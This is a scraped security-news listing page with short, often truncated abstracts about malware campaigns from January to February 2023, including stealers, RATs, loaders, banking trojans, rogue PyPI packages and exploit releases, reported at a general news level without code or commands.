Android mobile devices from top vendors in China have pre-installed malware Full Text
Abstract
Researchers reported that the top-of-the-line Android mobile devices sold in China are shipped with malware. China is currently the country with the largest number of Android mobile devices, but a recent study conducted by researchers from the University...Security Affairs
February 9, 2023
Enigma Stealer Targets Cryptocurrency Industry with Fake Jobs Full Text
Abstract
The initial stage of Enigma, Interview conditions.word.exe, is a downloader written in C++. Its primary objective is to download, deobfuscate, decompress, and launch the secondary stage payload.Cyware
February 9, 2023
Quasar RAT Propagated via Private Home Trading System Full Text
Abstract
A private Home Trading System is used to spread the Quasar RAT virus, according to ASEC. In other cases, phoney investment firms that passed for real ones persuaded customers to install a fake HTS so they could steal their money. Quasar RAT comes with remote command execution and uploading and down ... Read MoreCyware
February 09, 2023
Gootkit Malware Adopts New Tactics to Attack Healthcare and Finance Firms Full Text
Abstract
The Gootkit malware is prominently going after healthcare and finance organizations in the U.S., U.K., and Australia, according to new findings from Cybereason. The cybersecurity firm said it investigated a Gootkit incident in December 2022 that adopted a new method of deployment, with the actors abusing the foothold to deliver Cobalt Strike and SystemBC for post-exploitation. "The threat actor displayed fast-moving behaviors, quickly heading to control the network it infected, and getting elevated privileges in less than 4 hours," Cybereason said in an analysis published February 8, 2023. Gootkit, also called Gootloader, is exclusively attributed to a threat actor tracked by Mandiant as UNC2565. Starting its life in 2014 as a banking trojan, the malware has since morphed into a loader capable of delivering next-stage payloads. The shift in tactics was first uncovered by Sophos in March 2021. Gootloader takes the form of heavily-obfuscated JavaScript files thatThe Hacker News
February 8, 2023
New Graphiron info-stealer used in attacks against Ukraine Full Text
Abstract
A Russia-linked threat actor has been observed deploying a new information stealer dubbed Graphiron in attacks against Ukraine. Researchers from Broadcom Symantec spotted a Russia-linked ATP group, tracked as Nodaria (aka UAC-0056), deploying new info-stealing...Security Affairs
February 7, 2023
AveMaria Info-stealer Changes its Strategy to Infect More Users Full Text
Abstract
Zscaler’s ThreatLabz disclosed details about a new infostealer AveMaria RAT that targets sensitive data with added capabilities of remote camera control and privilege escalation. Over the past six months, the operators behind the info-stealer have been making significant additions to the execution ... Read MoreCyware
February 7, 2023
Banking Trojan TgToxic Targets Android Users in Southeast Asia Full Text
Abstract
Trend Micro experts took the wraps off of an ongoing campaign that has been targeting Android users in Southeast Asia since July 2022. It involves embedding a trojan they named TgToxic for harvesting user data from multiple fake finance and banking apps, including cryptocurrency wallets. The sample ... Read MoreCyware
February 06, 2023
GuLoader Malware Using Malicious NSIS Executables to Target E-Commerce Industry Full Text
Abstract
E-commerce industries in South Korea and the U.S. are at the receiving end of an ongoing GuLoader malware campaign, cybersecurity firm Trellix disclosed late last month. The malspam activity is notable for transitioning away from malware-laced Microsoft Word documents to NSIS executable files for loading the malware. Other countries targeted as part of the campaign include Germany, Saudi Arabia, Taiwan and Japan. NSIS , short for Nullsoft Scriptable Install System, is a script-driven open source system used to develop installers for the Windows operating system. While attack chains in 2021 leveraged a ZIP archive containing a macro-laced Word document to drop an executable file tasked with loading GuLoader, the new phishing wave employs NSIS files embedded within ZIP or ISO images to activate the infection. "Embedding malicious executable files in archives and images can help threat actors evade detection," Trellix researcher Nico Paulo Yturriaga said . Over the couThe Hacker News
February 06, 2023
FormBook Malware Spreads via Malvertising Using MalVirt Loader to Evade Detection Full Text
Abstract
An ongoing malvertising campaign is being used to distribute virtualized .NET loaders that are designed to deploy the FormBook information-stealing malware. "The loaders, dubbed MalVirt, use obfuscated virtualization for anti-analysis and evasion along with the Windows Process Explorer driver for terminating processes," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a technical write-up. The shift to Google malvertising is the latest example of how crimeware actors are devising alternate delivery routes to distribute malware ever since Microsoft announced plans to block the execution of macros in Office by default from files downloaded from the internet. Malvertising entails placing rogue search engine advertisements in hopes of tricking users searching for popular software like Blender into downloading the trojanized software. The MalVirt loaders, which are implemented in .NET, use the legitimate KoiVM virtualizing protector for .NET applicatiThe Hacker News
February 6, 2023
MalVirt Loader Distributes Formbook and XLoader with Unusual Levels of Obfuscation Full Text
Abstract
Cybercriminals were found distributing virtualized .NET malware loaders, dubbed MalVirt, in a Google Ads-based malvertising campaign to install the Formbook stealer and XLoader. The hackers used KoiVM virtualization technology to obfuscate their implementation and execution in their campaigns. The ... Read MoreCyware
February 04, 2023
PixPirate: New Android Banking Trojan Targeting Brazilian Financial Institutions Full Text
Abstract
A new Android banking trojan has set its eyes on Brazilian financial institutions to commit fraud by leveraging the PIX payments platform. Italian cybersecurity company Cleafy, which discovered the malware between the end of 2022 and the beginning of 2023, is tracking it under the name PixPirate. "PixPirate belongs to the newest generation of Android banking trojan, as it can perform ATS ( Automatic Transfer System ), enabling attackers to automate the insertion of a malicious money transfer over the Instant Payment platform Pix, adopted by multiple Brazilian banks," researchers Francesco Iubatti and Alessandro Strino said . It is also the latest addition in a long list of Android banking malware to abuse the operating system's accessibility services API to carry out its nefarious functions, including disabling Google Play Protect, intercepting SMS messages, preventing uninstallation, and serving rogue ads via push notifications. Besides stealing passwords enteredThe Hacker News
February 03, 2023
Post-Macro World Sees Rise in Microsoft OneNote Documents Delivering Malware Full Text
Abstract
In a continuing sign that threat actors are adapting well to a post-macro world , it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise. Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer , Agent Tesla, DOUBLEBACK , Quasar RAT, XWorm, Qakbot , BATLOADER , and FormBook . Enterprise firm Proofpoint said it detected over 50 campaigns leveraging OneNote attachments in the month of January 2023 alone. In some instances, the email phishing lures contain a OneNote file, which, in turn, embeds an HTA file that invokes a PowerShell script to retrieve a malicious binary from a remote server. Other scenarios entail the execution of a rogue VBScript that's embedded within the OneNote document and concealed behind an image that appears as a seemingly harmless button. The VBScript, for its part, is designed to drop a PowerShell script to run DOUBLEBACK. "The Hacker News
February 3, 2023
IceBreaker Backdoor Targets Gaming/Gambling Companies Full Text
Abstract
Online gaming and gambling firms are once again under attack by a never-before-seen backdoor known as IceBreaker. According to security analysts at SecurityJoes, the malware’s compromise method relies on tricking customer service agents into opening malicious screenshots that the threat actor sent ... Read MoreCyware
February 3, 2023
Konami Code Backdoor Concealed in Image File of Fake WordPress Plugins Full Text
Abstract
The malware was first detected back in 2019 within a compromised Drupal environment. However, over the last few months, it appears to have surged in popularity among attackers. It tends to be uploaded into WordPress environments as a fake plugin.Cyware
February 02, 2023
New Russian-Backed Gamaredon’s Spyware Variants Targeting Ukrainian Authorities Full Text
Abstract
The State Cyber Protection Centre (SCPC) of Ukraine has called out the Russian state-sponsored threat actor known as Gamaredon for its targeted cyber attacks on public authorities and critical information infrastructure in the country. The advanced persistent threat, also known as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and UAC-0010, has a track record of striking Ukrainian entities dating as far back as 2013. "UAC-0010 group's ongoing activity is characterized by a multi-step download approach and executing payloads of the spyware used to maintain control over infected hosts," the SCPC said . "For now, the UAC-0010 group uses GammaLoad and GammaSteel spyware in their campaigns." GammaLoad is a VBScript dropper malware engineered to download next-stage VBScript from a remote server. GammaSteel is a PowerShell script that's capable of conducting reconnaissance and executing additional commands. The goal of tThe Hacker News
February 1, 2023
New Prilex PoS Malware evolves to target NFC-enabled credit cards Full Text
Abstract
Authors of the Prolex PoS malware improved their malicious code to target contactless credit card transactions. The threat actors behind the sophisticated point-of-sale (PoS) malware Prilex have have improved its capabilities to block contactless...Security Affairs
February 01, 2023
New SH1MMER Exploit for Chromebook Unenrolls Managed ChromeOS Devices Full Text
Abstract
A new exploit has been devised to "unenroll" enterprise- or school-managed Chromebooks from administrative control. Enrolling ChromeOS devices makes it possible to enforce device policies as set by the organization via the Google Admin console , including the features that are available to users. "Each enrolled device complies with the policies you set until you wipe or deprovision it," Google states in its documentation. That's where the exploit – dubbed Shady Hacking 1nstrument Makes Machine Enrollment Retreat aka SH1MMER – comes in, allowing users to bypass these admin restrictions. The method is also a reference to shim, a Return Merchandise Authorization (RMA) disk image used by service center technicians to reinstall the operating system and run diagnosis and repair programs. The Google-signed shim image is a "combination of existing Chrome OS factory bundle components" – namely a release image, a toolkit, and the firmware, amonThe Hacker News
February 01, 2023
Prilex PoS Malware Evolves to Block Contactless Payments to Steal from NFC Cards Full Text
Abstract
The Brazilian threat actors behind an advanced and modular point-of-sale (PoS) malware known as Prilex have reared their head once again with new updates that allow it to block contactless payment transactions. Russian cybersecurity firm Kaspersky said it detected three versions of Prilex (06.03.8080, 06.03.8072, and 06.03.8070) that are capable of targeting NFC-enabled credit cards, taking its criminal scheme a notch higher. Having evolved out of ATM-focused malware into PoS malware over the years since going operational in 2014, the threat actor steadily incorporated new features that are designed to facilitate credit card fraud, including a technique called GHOST transactions . While contactless payments have taken off in a big way, in part due to the COVID-19 pandemic, the underlying motive behind the new functionality is to disable the feature so as to force the user to insert the card into the PIN pad. To that end, the latest version of Prilex, which Kaspersky discoverThe Hacker News
February 1, 2023
TrickGate, a packer used by malware to evade detection since 2016 Full Text
Abstract
TrickGate is a shellcode-based packer offered as a service to malware authors to avoid detection, CheckPoint researchers reported. TrickGate is a shellcode-based packer offered as a service, which is used at least since July 2016, to hide malware...Security Affairs
January 31, 2023
New GOOTLOADER Variant Evolves Further with New Obfuscation Tricks Full Text
Abstract
The UNC2565 hacker group appears to have restructured its GOOTLOADER (or Gootkit) malware by adding new components and implementing new obfuscation techniques. Gootkit is used by adversaries to drop additional malicious payloads, such as SunCrypt, REvil (Sodinokibi) ransomware, Kronos trojan, and C ... Read MoreCyware
January 31, 2023
New Report Reveals NikoWiper Malware That Targeted Ukraine Energy Sector Full Text
Abstract
The Russia-affiliated Sandworm used yet another wiper malware strain dubbed NikoWiper as part of an attack that took place in October 2022 targeting an energy sector company in Ukraine. "The NikoWiper is based on SDelete , a command line utility from Microsoft that is used for securely deleting files," cybersecurity company ESET revealed in its latest APT Activity Report shared with The Hacker News. The Slovak cybersecurity firm said the attacks coincided with missile strikes orchestrated by the Russian armed forces aimed at the Ukrainian energy infrastructure, suggesting overlaps in objectives. The disclosure comes merely days after ESET attributed Sandworm to a Golang-based data wiper known as SwiftSlicer that was deployed against an unnamed Ukrainian entity on January 25, 2023. The advanced persistent threat (APT) group linked to Russia's foreign military intelligence agency GRU has also been implicated in a partially successful attack targeting nationalThe Hacker News
January 31, 2023
Experts released VMware vRealize Log RCE exploit for CVE-2022-31706 Full Text
Abstract
Horizon3 security researchers released proof-of-concept (PoC) code for VMware vRealize Log Insight RCE vulnerability CVE-2022-31706. Last week, researchers from Horizon3’s Attack Team announced the release of PoC exploit code for remote code execution...Security Affairs
January 31, 2023
Researchers Uncover Packer Used by Several Malware to Evade Detection for 6 Years Full Text
Abstract
A shellcode-based packer dubbed TrickGate has been successfully operating without attracting notice for over six years, while enabling threat actors to deploy a wide range of malware such as TrickBot, Emotet, AZORult, Agent Tesla, FormBook, Cerber, Maze, and REvil over the years. "TrickGate managed to stay under the radar for years because it is transformative – it undergoes changes periodically," Check Point Research's Arie Olshtein said , calling it a "master of disguises." Offered as a service to other threat actors since at least late 2016, TrickGate helps conceal payloads behind a layer of wrapper code in an attempt to get past security solutions installed on a host. Packers can also function as crypters by encrypting the malware as an obfuscation mechanism. "Packers have different features that allow them to circumvent detection mechanisms by appearing as benign files, being difficult to reverse engineer, or incorporating sandbox evasion tecThe Hacker News
January 30, 2023
Titan Stealer: A New Golang-Based Information Stealer Malware Emerges Full Text
Abstract
A new Golang-based information stealer malware dubbed Titan Stealer is being advertised by threat actors through their Telegram channel. "The stealer is capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files," Uptycs security researchers Karthickkumar Kathiresan and Shilpesh Trivedi said in a recent report. Details of the malware were first documented by cybersecurity researcher Will Thomas (@BushidoToken) in November 2022 by querying the IoT search engine Shodan. Titan is offered as a builder, enabling customers to customize the malware binary to include specific functionalities and the kind of information to be exfiltrated from a victim's machine. The malware, upon execution, employs a technique known as process hollowing to inject the malicious payload into the memory of a legitimate process known as AppLaThe Hacker News
January 30, 2023
Gootkit Malware Evolves with New Components and Obfuscations Full Text
Abstract
Gootkit runs on an access-a-as-a-service model used by different groups to drop additional malicious payloads on compromised systems. It has been known to use fileless techniques to deliver threats such as SunCrypt, REvil, Kronos, and Cobalt Strike.Cyware
January 30, 2023
Godfather Banking Trojan Expands Application Targeting to Affect More Europe-Based Victims Full Text
Abstract
The most notable features of Godfather malware are bypassing 2FA by capturing SMS texts or notifications and executing itself as an Android service by abusing Accessibility Services to keep persistent and privileged access on infected devices.Cyware
January 29, 2023
Gootkit Malware Continues to Evolve with New Components and Obfuscations Full Text
Abstract
The threat actors associated with the Gootkit malware have made "notable changes" to their toolset, adding new components and obfuscations to their infection chains. Google-owned Mandiant is monitoring the activity cluster under the moniker UNC2565 , noting that the usage of the malware is "exclusive to this group." Gootkit , also called Gootloader, is spread through compromised websites that victims are tricked into visiting when searching for business-related documents like agreements and contracts via a technique called search engine optimization (SEO) poisoning. The purported documents take the form of ZIP archives that harbor the JavaScript malware, which, when launched, paves the way for additional payloads such as Cobalt Strike Beacon , FONELAUNCH, and SNOWCONE. FONELAUNCH is a .NET-based loader designed to load an encoded payload into memory, and SNOWCONE is a downloader that's tasked with retrieving next-stage payloads, typically IcedID , viaThe Hacker News
January 29, 2023
Watch out! Experts plans to release VMware vRealize Log RCE exploit next week Full Text
Abstract
Horizon3's Attack Team made the headlines again announcing the releasse of a PoC exploit code for remote code execution in VMware vRealize Log. Researchers from the Horizon3's Attack Team announced the release of PoC exploit code for remote code execution...Security Affairs
January 27, 2023
Aurora Infostealer Malware Deploys Shapeshifting Tactics Full Text
Abstract
Cyble researchers determined that, in order to target a variety of well-known applications, the attackers are actively changing and customizing their phishing websites. Aurora targets data from web browsers and crypto wallets, among others.Cyware
January 27, 2023
Python-based PY#RATION RAT Stealthily Harvests Sensitive Information Full Text
Abstract
PY#RATION can transfer files from the infected host machine to its C2 servers or vice versa. It uses WebSockets to avoid detection and for C2 communication and exfiltration.Cyware
January 27,2023
Researchers Discover New PlugX Malware Variant Spreading via Removable USB Devices Full Text
Abstract
Cybersecurity researchers have uncovered a PlugX sample that employs sneaky methods to infect attached removable USB media devices in order to propagate the malware to additional systems. "This PlugX variant is wormable and infects USB devices in such a way that it conceals itself from the Windows operating file system," Palo Alto Networks Unit 42 researchers Mike Harbison and Jen Miller-Osborn said . "A user would not know their USB device is infected or possibly used to exfiltrate data out of their networks." The cybersecurity company said it uncovered the artifact during an incident response effort following a Black Basta ransomware attack against an unnamed victim. Among other tools discovered in the compromised environment include the Gootkit malware loader and the Brute Ratel C4 red team framework. The use of Brute Ratel by the Black Basta group was previously highlighted by Trend Micro in October 2022, with the software delivered as a second-stageThe Hacker News
January 27,2023
3 Lifehacks While Analyzing Orcus RAT in a Malware Sandbox Full Text
Abstract
Orcus is a Remote Access Trojan with some distinctive characteristics. The RAT allows attackers to create plugins and offers a robust core feature set that makes it quite a dangerous malicious program in its class. RAT is quite a stable type that always makes it to the top. ANY.RUN's top malware types in 2022 That's why you'll definitely come across this type in your practice, and the Orcus family specifically. To simplify your analysis, we have collected 3 lifehacks you should take advantage of. Here we go. What is Orcus RAT? Definition . Orcus RAT is a type of malicious software program that enables remote access and control of computers and networks. It is a type of Remote Access Trojan (RAT) that has been used by attackers to gain access to and control computers and networks. Capabilities . Once downloaded onto a computer or network, it begins to execute its malicious code, allowing the attacker to gain access and control. It is capable of stealing data, conductinThe Hacker News
January 26,2023
PY#RATION: New Python-based RAT Uses WebSocket for C2 and Data Exfiltration Full Text
Abstract
Cybersecurity researchers have unearthed a new attack campaign that leverages a Python-based remote access trojan (RAT) to gain control over compromised systems since at least August 2022. "This malware is unique in its utilization of WebSockets to avoid detection and for both command-and-control (C2) communication and exfiltration," Securonix said in a report shared with The Hacker News. The malware, dubbed PY#RATION by the cybersecurity firm, comes with a host of capabilities that allows the threat actor to harvest sensitive information. Later versions of the backdoor also sport anti-evasion techniques, suggesting that it's being actively developed and maintained. The attack commences with a phishing email containing a ZIP archive, which, in turn, harbors two shortcut (.LNK) files that masquerade as front and back side images of a seemingly legitimate U.K. driver's license. Opening each of the .LNK files retrieves two text files from a remote server that aThe Hacker News
January 24,2023
Emotet Malware Makes a Comeback with New Evasion Techniques Full Text
Abstract
The Emotet malware operation has continued to refine its tactics in an effort to fly under the radar, while also acting as a conduit for other dangerous malware such as Bumblebee and IcedID. Emotet, which officially reemerged in late 2021 following a coordinated takedown of its infrastructure by authorities earlier that year, has continued to be a persistent threat that's distributed via phishing emails. Attributed to a cybercrime group tracked as TA542 (aka Gold Crestwood or Mummy Spider), the virus has evolved from a banking trojan to a malware distributor since its first appearance in 2014. The malware-as-a-service (MaaS) is also modular, capable of deploying an array of proprietary and freeware components that can exfiltrate sensitive information from compromised machines and carry out other post-exploitation activities. Two latest additions to Emotet's module arsenal comprise an SMB spreader that's designed to facilitate lateral movement using a list of hThe Hacker News
January 23, 2023
Malicious Apps Masquerade as Government Agencies to Distribute Gigabud RAT Full Text
Abstract
A new Android malware, named Gigabud, was found impersonating government agencies, financial institutions, and other organizations from Thailand, Peru, and the Philippines to harvest user banking credentials. Gigabud leverages a server-side verification process to ensure that the mobile number ... Read MoreCyware
January 22, 2023
Roaming Mantis uses new DNS changer in its Wroba mobile malware Full Text
Abstract
Roaming Mantis threat actors were observed using a new variant of their mobile malware Wroba to hijack DNS settings of Wi-Fi routers. Researchers from Kaspersky observed Roaming Mantis threat actors using an updated variant of their mobile malware...Security Affairs
January 21, 2023
Attackers Crafted Custom Malware for Fortinet Zero-Day Full Text
Abstract
Researchers analyzing data associated with a recently disclosed zero-day vulnerability in Fortinet's FortiOS SSL-VPN technology have identified a sophisticated new backdoor specifically designed to run on Fortinet's FortiGate firewalls.Cyware
January 20,2023
Roaming Mantis Spreading Mobile Malware That Hijacks Wi-Fi Routers’ DNS Settings Full Text
Abstract
Threat actors associated with the Roaming Mantis attack campaign have been observed delivering an updated variant of their patent mobile malware known as Wroba to infiltrate Wi-Fi routers and undertake Domain Name System ( DNS ) hijacking. Kaspersky, which carried out an analysis of the malicious artifact, said the feature is designed to target specific Wi-Fi routers located in South Korea. Roaming Mantis, also known as Shaoye, is a long-running financially motivated operation that singles out Android smartphone users with malware capable of stealing bank account credentials as well as harvesting other kinds of sensitive information. Although primarily targeting the Asian region since 2018, the hacking crew was detected expanding its victim range to include France and Germany for the first time in early 2022 by camouflaging the malware as the Google Chrome web browser application. The attacks leverage smishing messages as the initial intrusion vector of choice to deliverThe Hacker News
January 19, 2023
Roaming Mantis implements new DNS changer in its malicious mobile app in 2022 Full Text
Abstract
Roaming Mantis (aka Shaoye) is well-known campaign that uses malicious APK files to control infected Android devices and steal device information; it also uses phishing pages to steal user credentials, with a strong financial motivation.Cyware
January 19,2023
Android Users Beware: New Hook Malware with RAT Capabilities Emerges Full Text
Abstract
The threat actor behind the BlackRock and ERMAC Android banking trojans has unleashed yet another malware for rent called Hook that introduces new capabilities to access files stored in the devices and create a remote interactive session. ThreatFabric, in a report shared with The Hacker News, characterized Hook as a novel ERMAC fork that's advertised for sale for $7,000 per month while featuring "all the capabilities of its predecessor." "In addition, it also adds to its arsenal Remote Access Tooling (RAT) capabilities, joining the ranks of families such as Octo and Hydra , which are capable performing a full Device Take Over (DTO), and complete a full fraud chain, from PII exfiltration to transaction, with all the intermediate steps, without the need of additional channels," the Dutch cybersecurity firm said. A majority of the financial apps targeted by the malware are located in the U.S., Spain, Australia, Poland, Canada, Turkey, the U.K., FranThe Hacker News
January 19, 2023
Critical Microsoft Azure RCE flaw impacted multiple services Full Text
Abstract
Researchers found a new critical remote code execution (RCE) flaw impacting multiple services related to Microsoft Azure. Researchers from Ermetic found a remote code execution flaw, dubbed EmojiDeploy, that impacts Microsoft Azure services and other...Security Affairs
January 19, 2023
Batloader Abused Legitimate Tools in Q4 2022 Full Text
Abstract
Trend Micro laid bare details of Batloader malware in a report that has anti-sandboxing capabilities and can fingerprint hosts for legitimacy. The modular malware abuses legitimate tools such as NirCmd.exe and Nsudo.exe to escalate privileges. First observed in the last quarter of 2022, it was foun ... Read MoreCyware
January 18,2023
Earth Bogle Campaign Unleashes NjRAT Trojan on Middle East and North Africa Full Text
Abstract
An ongoing campaign dubbed Earth Bogle is leveraging geopolitical-themed lures to deliver the NjRAT remote access trojan to victims across the Middle East and North Africa. "The threat actor uses public cloud storage services such as files[.]fm and failiem[.]lv to host malware, while compromised web servers distribute NjRAT," Trend Micro said in a report published Wednesday. Phishing emails, typically tailored to the victim's interests, are loaded with malicious attachments to activate the infection routine. This takes the form of a Microsoft Cabinet (CAB) archive file containing a Visual Basic Script dropper to deploy the next-stage payload. Alternatively, it's suspected that the files are distributed via social media platforms such as Facebook and Discord, in some cases even creating bogus accounts to serve ads on pages impersonating legitimate news outlets. The CAB files, hosted on cloud storage services, also masquerade as sensitive voice calls to enticeThe Hacker News
January 18, 2023
Abuse of GitHub Codespaces may Turn it into Malware Distribution Center Full Text
Abstract
New research revealed that a feature in GitHub Codespaces could be exploited by threat actors to deliver malware of their choice to a compromised device. Experts at Trend Micro demonstrated a scenario where they could serve malicious content at a rapid rate by exposing ports to the public.Cyware
January 17, 2023
Rhadamanthys Stealer Spreads via Spam Emails and Google Ads Full Text
Abstract
Cybercriminals are using phishing websites to mimic popular software, and raking it better via Google Ads, to trick users into downloading Rhadamanthys Stealer. The stealer spreads using spam emails, including an attachment to drop the malicious payload. The stealer targets several applications, in ... Read MoreCyware
January 17, 2023
Massive Network of Hundreds of Fake Websites Distributing Raccoon and Vidar Stealers Full Text
Abstract
Attackers have been using a large and resilient infrastructure to distribute two prominent info-stealers—Raccoon and Vidar—possibly since early 2020, revealed security experts. Experts found that the intrusion sets are implementing defense evasion techniques to increase the chances of successfully ... Read MoreCyware
January 17, 2023
Google Ads Malware Wipes NFT Influencer’s Crypto Wallet Full Text
Abstract
An NFT influencer with the Twitter handle @NFT_GOD claims to have lost thousands of dollars worth of non-fungible tokens (NFTs) and crypto in a Google Ads-delivered malware attack.Cyware
January 17, 2023
This banking virus is ‘December 2022’s Most Wanted Malware’ Full Text
Abstract
According to Check Point's Global Threat Index for December 2022 report, Qbot was the most prevalent malware last month impacting 7% of organizations worldwide, followed by Emotet with a global impact of 4% and XMRig with a global impact of 3%.Cyware
January 17,2023
Zoho ManageEngine PoC Exploit to be Released Soon - Patch Before It’s Too Late! Full Text
Abstract
Users of Zoho ManageEngine are being urged to patch their instances against a critical security vulnerability ahead of the release of a proof-of-concept ( PoC ) exploit code. The issue in question is CVE-2022-47966 , an unauthenticated remote code execution vulnerability affecting several products due to the use of an outdated third-party dependency, Apache Santuario. "This vulnerability allows an unauthenticated adversary to execute arbitrary code," Zoho warned in an advisory issued late last year, noting that it affects all ManageEngine setups that have the SAML single sign-on (SSO) feature enabled, or had it enabled in the past. Horizon3.ai has now released Indicators of Compromise (IOCs) associated with the flaw, stating that it was able to successfully reproduce the exploit against ManageEngine ServiceDesk Plus and ManageEngine Endpoint Central products. "The vulnerability is easy to exploit and a good candidate for attackers to 'spray and pray' acrThe Hacker News
January 17, 2023
Fortinet observed three rogue PyPI packages spreading malware Full Text
Abstract
Researchers discovered three malicious packages that have been uploaded to the Python Package Index (PyPI) repository by Lolip0p group. FortiGuard Labs researchers discovered three malicious PyPI packages (called ‘colorslib’, ‘httpslib’,...Security Affairs
January 17,2023
Researchers Uncover 3 PyPI Packages Spreading Malware to Developer Systems Full Text
Abstract
A threat actor by the name Lolip0p has uploaded three rogue packages to the Python Package Index (PyPI) repository that are designed to drop malware on compromised developer systems. The packages – named colorslib (versions 4.6.11 and 4.6.12), httpslib (versions 4.6.9 and 4.6.11), and libhttps (version 4.6.12) – by the author between January 7, 2023, and January 12, 2023. They have since been yanked from PyPI but not before they were cumulatively downloaded over 550 times. The modules come with identical setup scripts that are designed to invoke PowerShell and run a malicious binary (" Oxzy.exe ") hosted on Dropbox, Fortinet disclosed in a report published last week. The executable, once launched, triggers the retrieval of a next-stage, also a binary named update.exe , that runs in the Windows temporary folder ("%USER%\AppData\Local\Temp\"). update.exe is flagged by antivirus vendors on VirusTotal as an information stealer that's also capable ofThe Hacker News
January 16, 2023
EyeSpy Spyware Targets Iranian VPN Users Full Text
Abstract
Bitdefender security analysts stumbled across a malware threat campaign dropping EyeSpy spyware. It is originally considered to be a part of a monitoring application called SecondEye. The campaign appears to have begun in May last year from Iran, with infections detected across Germany and the U.S. ... Read MoreCyware
January 16,2023
Raccoon and Vidar Stealers Spreading via Massive Network of Fake Cracked Software Full Text
Abstract
A "large and resilient infrastructure" comprising over 250 domains is being used to distribute information-stealing malware such as Raccoon and Vidar since early 2020. The infection chain "uses about a hundred of fake cracked software catalogue websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub," cybersecurity firm SEKOIA said in an analysis published earlier this month. The French cybersecurity company assessed the domains to be operated by a threat actor running a traffic direction system ( TDS ), which allows other cybercriminals to rent the service to distribute their malware. The attacks target users searching for cracked versions of software and games on search engines like Google, surfacing fraudulent websites on top by leveraging a technique called search engine optimization (SEO) poisoning to lure victims into downloading and executing the malicious payloads. The poisoned resultThe Hacker News
January 16, 2023
Experts spotted a backdoor that borrows code from CIA’s Hive malware Full Text
Abstract
Netlab 360 observed unidentified threat actors using a new backdoor based on the US CIA's Project Hive malware suite. Researchers from Qihoo Netlab 360 reported that unidentified threat actors using a new backdoor based on the US CIA's Project Hive...Security Affairs
January 16,2023
New Backdoor Created Using Leaked CIA’s Hive Malware Discovered in the Wild Full Text
Abstract
Unidentified threat actors have deployed a new backdoor that borrows its features from the U.S. Central Intelligence Agency (CIA)'s Hive multi-platform malware suite , the source code of which was released by WikiLeaks in November 2017. "This is the first time we caught a variant of the CIA Hive attack kit in the wild, and we named it xdr33 based on its embedded Bot-side certificate CN=xdr33," Qihoo Netlab 360's Alex Turing and Hui Wang said in a technical write-up published last week. xdr33 is said to be propagated by exploiting an unspecified N-day security vulnerability in F5 appliances. It communicates with a command-and-control (C2) server using SSL with forged Kaspersky certificates. The intent of the backdoor, per the Chinese cybersecurity firm, is to harvest sensitive information and act as a launchpad for subsequent intrusions. It improves upon Hive by adding new C2 instructions and functionalities, among other implementation changes. The ELFThe Hacker News
January 11,2023
New Analysis Reveals Raspberry Robin Can be Repurposed by Other Threat Actors Full Text
Abstract
A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat. Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is malware that has increasingly come under the radar for being used in attacks aimed at finance, government, insurance, and telecom entities. Given its use multiple threat actors to drop a wide range of payloads such as SocGholish , Bumblebee , TrueBot , IcedID , and LockBit ransomware, it's suspected to be a pay-per-install (PPI) botnet capable of serving next-stage payloads. Raspberry Robin, notably, employs infected USB drives as a propagation mechanism and leverages breached QNAP network-attached storage (NAS) devices as first-level command-and-control (C2). Cybersecurity firm SEKOIA said it was able to identify at least eight virtual private servers (VPSs) hostedThe Hacker News
January 10, 2023
Kinsing malware targets Kubernetes environments via misconfigured PostgreSQL Full Text
Abstract
Kinsing cryptojacking operators are exploiting misconfigured and exposed PostgreSQL servers to access Kubernetes environments. Researchers at Microsoft Defender for Cloud observed threat actors behind the Kinsing cryptojacking operation...Security Affairs
January 09,2023
Malicious PyPI Packages Using Cloudflare Tunnels to Sneak Through Firewalls Full Text
Abstract
In yet another campaign targeting the Python Package Index (PyPI) repository, six malicious packages have been found deploying information stealers on developer systems. The now-removed packages, which were discovered by Phylum between December 22 and December 31, 2022, include pyrologin, easytimestamp, discorder, discord-dev, style.py, and pythonstyles. The malicious code, as is increasingly the case , is concealed in the setup script (setup.py) of these libraries, meaning running a "pip install" command is enough to activate the malware deployment process. The malware is designed to launch a PowerShell script that retrieves a ZIP archive file, install invasive dependencies such as pynput, pydirectinput, and pyscreenshot, and run a Visual Basic Script extracted from the archive to execute more PowerShell code. "These libraries allow one to control and monitor mouse and keyboard input and capture screen contents," Phylum said in a technical report publishedThe Hacker News
January 8, 2023
Dridex targets MacOS users with a new delivery technique Full Text
Abstract
Experts warn of a new variant of the Dridex banking malware that is targeting systems using the macOS operating system. Trend Micro experts discovered a new variant of the Dridex banking malware that targets the MacOS platform and that used a new technique...Security Affairs
January 7, 2023
Vidar Stealer Operators Exploit SM Platforms to Evade Detection Full Text
Abstract
Information-stealer Vidar is once again found exploiting social media services such as TikTok, Telegram, Steam, and Mastodon as an intermediate command-and-control (C2) server. One advantage of this tactic is that such traffic is really difficult to identify and block using trivial security solutio ... Read MoreCyware
January 7, 2023
IcedID malware campaign targets Zoom users Full Text
Abstract
Cyber researchers warn of a modified Zoom app that was used by threat actors in a phishing campaign to deliver the IcedID Malware. Cyble researchers recently uncovered a phishing campaign targeting users of the popular video conferencing and online...Security Affairs
January 7, 2023
Can You Trust Your VSCode Extensions? Full Text
Abstract
Aqua Nautilus researchers have recently discovered that attackers can easily impersonate popular Visual Studio Code extensions and trick unknowing developers into downloading them.Cyware
January 06,2023
Dridex Malware Now Attacking macOS Systems with Novel Infection Method Full Text
Abstract
